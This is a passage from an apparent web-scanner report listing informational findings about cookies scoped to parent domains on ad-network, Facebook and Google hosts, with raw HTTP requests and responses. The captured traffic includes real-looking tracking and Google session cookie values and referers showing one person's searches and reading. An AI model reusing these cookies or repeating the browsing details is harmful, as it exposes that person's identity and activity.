Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/253735225/direct HTTP/1.1
Host: clk.atdmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.lifelock.com/default.aspx
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001304592768-11852912; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: MUID=1E470D4DBBFA4EA89878F04E3A6F1B62; expires=Monday, 21-Nov-2011 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach00=6cb8/120af; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=772a248/120af/f1fb139/6cb8/4dc28180; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Thu, 05 May 2011 10:52:48 GMT
Connection: close


16.58. http://clk.atdmt.com/go/253735228/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /go/253735228/direct

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/253735228/direct HTTP/1.1
Host: clk.atdmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.lifelock.com/default.aspx
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001304592768-11852732; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: MUID=82D4FA476FA049968CFA519E7F0F9D41; expires=Monday, 21-Nov-2011 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach00=6cb8/120af; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=772a274/120af/f1fb13c/6cb8/4dc28180; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Thu, 05 May 2011 10:52:48 GMT
Connection: close


16.59. http://clk.atdmt.com/go/310177527/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /go/310177527/direct

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/310177527/direct HTTP/1.1
Host: clk.atdmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.citi.com/domain/home.htm
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001304592768-11852792; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: MUID=3C04F9261C6F4A83B12A2D2F035CAB9C; expires=Monday, 21-Nov-2011 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach00=c054/278e5; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=b08aeb9/278e5/127ceef7/c054/4dc28180; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Thu, 05 May 2011 10:52:47 GMT
Connection: close


16.60. http://clk.atdmt.com/go/314366790/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /go/314366790/direct

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/314366790/direct HTTP/1.1
Host: clk.atdmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.sprint.com
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001304592768-11853752; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: MUID=3DE6EDA96D3F43C4A3BE01A32E3B4637; expires=Monday, 21-Nov-2011 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach00=c42d/26fc; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=88df6e/26fc/12bcdb46/c42d/4dc28180; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Thu, 05 May 2011 10:52:48 GMT
Connection: close


16.61. http://clk.atdmt.com/go/319709115/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /go/319709115/direct

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/319709115/direct HTTP/1.1
Host: clk.atdmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.att.com/?1
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001304592768-11853482; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: MUID=C8B9F81D48AC41F78FBBF63F33CDDFF8; expires=Monday, 21-Nov-2011 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach00=6cb8/1a43a; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=39505b4/1a43a/130e5fbb/6cb8/4dc28180; expires=Saturday, 04-May-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Thu, 05 May 2011 10:52:47 GMT
Connection: close


16.62. http://developers.facebook.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://developers.facebook.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: developers.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=iYHCTdc7DK0nHY1ABdOZIOOt; expires=Sat, 04-May-2013 10:52:57 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=lJrnB; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.233.116
Connection: close
Date: Thu, 05 May 2011 10:52:57 GMT
Content-Length: 14534

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

16.63. http://developers.facebook.com/plugins/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://developers.facebook.com
Path:   /plugins/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /plugins/ HTTP/1.1
Host: developers.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: /docs/plugins
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=iYuAk; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fdevelopers.facebook.com%2Fplugins%2F; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fdevelopers.facebook.com%2Fplugins%2F; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.37.16.114
Connection: close
Date: Thu, 05 May 2011 10:52:56 GMT
Content-Length: 0


16.64. http://feedburner.google.com/fb/a/mailverify

Summary

Severity:   Information
Confidence:   Certain
Host:   http://feedburner.google.com
Path:   /fb/a/mailverify

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fb/a/mailverify HTTP/1.1
Host: feedburner.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Thu, 05 May 2011 10:53:03 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Set-Cookie: S=feedburner-control-panel=QCfNUmJbZJu2SDH5i0eLiw; Domain=.google.com; Path=/; HttpOnly
Server: GSE
Expires: Thu, 05 May 2011 10:53:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>

<head>
<meta name="r
...[SNIP]...

16.65. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /activityi HTTP/1.1
Host: fls.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Set-Cookie: test_cookie=CheckForPermission; expires=Thu, 05-May-2011 11:08:03 GMT; path=/; domain=.doubleclick.net
Location: /activityi?&_dc_ck=try
Date: Thu, 05 May 2011 10:53:03 GMT
Content-Type: text/html; charset=UTF-8
Server: Floodlight server
Content-Length: 223
X-XSS-Protection: 1; mode=block
Connection: close

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="/activityi?&amp;_dc_ck=try">here
...[SNIP]...

16.66. http://fusion.google.com/add

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fusion.google.com
Path:   /add

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /add HTTP/1.1
Host: fusion.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Location: http://www.google.com/ig/add
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=5dcdac76151b5a82:TM=1304592784:LM=1304592784:S=fQ1PrRcqpq9zNDdI; expires=Sat, 04-May-2013 10:53:04 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Thu, 05 May 2011 10:53:04 GMT
Server: igfe
Content-Length: 225
X-XSS-Protection: 1; mode=block
Connection: close

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.google.com/ig/add">he
...[SNIP]...

16.67. http://googleads.g.doubleclick.net/aclk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /aclk

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /aclk HTTP/1.1
Host: googleads.g.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=CheckForPermission; expires=Thu, 05-May-2011 11:08:05 GMT; path=/; domain=.doubleclick.net
X-Content-Type-Options: nosniff
Date: Thu, 05 May 2011 10:53:05 GMT
Server: AdClickServer
Content-Length: 0
X-XSS-Protection: 1; mode=block
Connection: close


16.68. http://graph.facebook.com/10134017/picture

Summary

Severity:   Information
Confidence:   Certain
Host:   http://graph.facebook.com
Path:   /10134017/picture

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /10134017/picture HTTP/1.1
Host: graph.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: image/jpeg
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://profile.ak.fbcdn.net/hprofile-ak-snc4/49703_10134017_5151_q.jpg
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-FB-Rev: 374220
Set-Cookie: datr=kYHCTZUXfL6UkV912axfpXJ9; expires=Sat, 04-May-2013 10:53:05 GMT; path=/; domain=.facebook.com; httponly
X-FB-Server: 10.36.2.106
Connection: close
Date: Thu, 05 May 2011 10:53:05 GMT
Content-Length: 0


16.69. http://groups.google.com/grphp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /grphp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /grphp HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=1251087ecc6a48b8:TM=1304592786:LM=1304592786:S=3Og75Dhdbvu6iji7; expires=Sat, 04-May-2013 10:53:06 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Thu, 05 May 2011 10:53:06 GMT
Server: GWS-GRFE/0.50
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

16.70. http://ib.adnxs.com/getuid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /getuid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuid HTTP/1.1
Host: ib.adnxs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anj=Kfu=8fG7vhgj[2<?0P(*AuB-u**g1:XIEGDEhzW()U9M1kUGf3$2.f0R>9.acl`F4%p2Nl.UXEE*e?s.KZk)1P8:JhD>3]0OXTvN!yxE%+(uoie>W`_v8QfQ%yo5xj:Z3>gd/L60<:0H$58xf@TP8EN^Aa7.qES'cu)ziVp`aanbh'IXK_')9#*'OqB0__+7d).vaGpBe9>V?b=^3-#H@!=%>IE/HM`)s3*[`hUEAwY-atIxWZl9RF$+OaI:l_Qcc9wmRBbW$qm9'55djeSa8ZQ96*Jp)C^/<CN-yHf5FURTYHOv]@%<7Aq6u^k]-O]7X=2zKSL4quR8kO_D>X[HvK1.Z8LyTgPDtFmwP=9UjfKherrC(!HN)-rs$$.Z4RwKgg$hjvE=h]Y3^aGI31FC_+(AsbutS4%o=cG=F6ppp35v0Hp53EQnWXio#:w1_scIl_O(gee'(4OTfW/q:Rz1+w6b.Vi<p.T*C2GR6e]tqP0@3dSr9ox*G.!htZ]Mz+FTi@UGkKz@XApYJmq$=Vw>B=cnuV1(XHu?f9kld6tUGu]mWIwdMo@:9[ns]Nq8sV$[>K:4>wF](16qdoZ$6'I1F:`tO4!]q; icu=ChII-sEBEAoYCiAKKAowg_iG7gQQg_iG7gQYCQ..; uuid2=2724386019227846218; sess=1;

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 06-May-2011 10:53:08 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 03-Aug-2011 10:53:08 GMT; domain=.adnxs.com; HttpOnly
Location: .r..
Date: Thu, 05 May 2011 10:53:08 GMT
Content-Length: 0
Connection: close


16.71. http://ib.adnxs.com/seg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add_code=impx-11265&member=30 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=558358678
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=ChII-sEBEAoYCiAKKAowg_iG7gQQg_iG7gQYCQ..; uuid2=2724386019227846218; anj=Kfu=8fG3H<gj[2<?0P(*AuB-u**g1:XIC/YEhzW()U9M1kUGf3$2.f0R>9.acl`F4%p2Nl.USAA5%p=ns=x+Fe(?TVP/3EvwIwXVG/C'4kuR0A+-n_?4c-mu!]%BWXd`?@tfAa<+!_/VspH.U'0z[`+B!NHr_LqEQC4x@)Wh.XhAYMSiB>b:H_Ow0gYes6GHi7EI3eK]3R@Nl5CoFO45k[tKrMi>.Xt]9[@n31$+nwyPZ7U=W>LHM3T4M#^Q3pkmWg+3nH/]xnzHZ=N!I$Hx4)P'kV3)6R-eMV?4^a>]$!X9^RDTuLu`Gg9=dIc4+hibOXVH]p[b-Lx59F*+>q<CtTaN9@TN[vcG0(%aAJ6ScVP9Rgm4M%1YSthSq=>Jd^iV`cWHV`F6?xon6Z1/S]G>.Wu?NMcN*Y`V#)%)OV_QG()XRaedXxb$efFw3t8l7.U##!8D4?lqLt?01nF6CJf8gn+.75!Vt'v4`4hVA[Pc!]W'fkGXx@#:^z*`9N.gOhM'TW?sFcTmQscP<M2bs#'%dOligD[XKrGEswk(rz[pWLu[iDz*Y[Zrh8s526Zn5(MSVle^Zq<pbIVZk8

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 06-May-2011 01:41:26 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 03-Aug-2011 01:41:26 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 03-Aug-2011 01:41:26 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhgj[2<?0P(*AuB-u**g1:XIEGDEhzW()U9M1kUGf3$2.f0R>9.acl`F4%p2Nl.UXEE*e9QAKZcy$'4zkTds`G>$Y2_x#xl](4L*gWQ!82Bsq+?%*xcHu[9c=WUo?_H=omCl'GEsQ[iaDe#'0CL9KAs*NVQnV5j2JGe0swn8Zaw0O$2+zjGg9A4LL08uJXhaPreyXK>i@7$l[!U)We]9m<`:lBnx?T21cb77Gmou6^jD(gcglEnRT=%NN4q`+Hi!%kFnwGHiuX+I5YoNIO5k0c[MSbx7njQGi0)-:TDf>[)JB]jN^AZA:`:L7xFdq.[obo+6+xCdX6<ltYh08Mux1S'0z]_vHY>/[t(FMmmF*#lx04hmgH0:F)jjQU-9VrfVL56DAFjnC[+iB4JzuIs9/2)f>jZThg)leCe+@mgjPZ%dW:Bb$Rj9Bo27TC#RW=N*iwo-SVIWP.#z/sJdL2VU(L03b#EtIR%6X!=wVP+l85o2j8#Rl>$Iv5i.MV/kZjpZ8G74qc2+D1uzmGIeWZ</89#NPP@BCHq3Xs?bW#eKx%nQO@J>7xjRP*'?@DNFXWD.-?fzPd<KUtm?hRHnG2[)S; path=/; expires=Wed, 03-Aug-2011 01:41:26 GMT; domain=.adnxs.com; HttpOnly
Location: http://cm.g.doubleclick.net/pixel?nid=appnexus1
Date: Thu, 05 May 2011 01:41:26 GMT
Content-Length: 0


16.72. http://id.google.com/verify/EAAAAC-C2hTTg1_wpgNVul6NqWU.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAC-C2hTTg1_wpgNVul6NqWU.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAC-C2hTTg1_wpgNVul6NqWU.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Bucky+A+Jordan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=46=r0Yu_Pti74HDNSkQe8JACIqi4Uotl4cbu9_A2Tb8wQ=8Xt3Q4d7RugZsGwF; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=Ba0U4da8P8fQA7x45DtUHYILglZeYGIGups8rg_DvVz_eZJte3UjlHF5LBgdHRELPDWgg_M2c4cfEuCb_MKRBOuEFsxKD3DPCgbNnbLWJ4NjJXl0O-Jy3456noCUlqNv

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=46=UrwH2RxwC7ZsSJyWfFlrI-jbKn3sUG0hNYbD9nXZ_w=SV6Ehvzqcn14QUEO; expires=Fri, 04-Nov-2011 02:45:54 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Thu, 05 May 2011 02:45:54 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

16.73. http://idcs.interclick.com/Segment.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=697a8088-0d41-4f72-9fb6-5bc7ecc099e8 HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=c3e2564e-78bb-4fe5-b016-9ebe8e804603; tpd=e20=1305834684215&e90=1303847484419&e50=1305834684416&e100=1303847484462; sgm=8239=734250&8144=734251&9621=734251&9234=734252&9622=734254&7901=734255&7472=734256

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=8239=734250&8144=734251&9621=734251&9234=734252&9622=734254&7901=734255&7472=734256&10677=734260; domain=.interclick.com; expires=Wed, 05-May-2021 01:02:51 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Thu, 05 May 2011 01:02:50 GMT

GIF89a.............!.......,...........D..;

16.74. http://image3.pubmatic.com/AdServer/UPug

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image3.pubmatic.com
Path:   /AdServer/UPug

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/UPug?operId=2&pubId=19677&pixId=16&ran=0.8117935182526708&pageURL=http://www.huffingtonpost.com/ HTTP/1.1
Host: image3.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:2931142961646634775; KRTBCOOKIE_57=476-uid:2724386019227846218; KRTBCOOKIE_27=1216-uid:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; KRTBCOOKIE_133=1873-xrd52zkwjuxh; KRTBCOOKIE_53=424-c1e1301e-3a1f-4ca7-9870-f636b5f10e66; PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104.1359_1306933483.1555_1398966889

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:26 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: KADUSERCOOKIE=AF9BE934-13F3-41C9-ACC3-875388B259BA; domain=pubmatic.com; expires=Fri, 04-May-2012 00:59:26 GMT; path=/
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Connection: close
Content-Type: text/html
Content-Length: 484

document.write('<script type="text/javascript" src="http://ads.pubmatic.com/UniversalPixel/19677/16/pixel.js"></script>');
document.write('<iframe name="pbeacon" frameborder="0" allowtransparency="tru
...[SNIP]...

16.75. http://images.apple.com/global/nav/styles/navigation.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/nav/styles/navigation.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/nav/styles/navigation.css HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/app/engadget/id347839246?mt=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
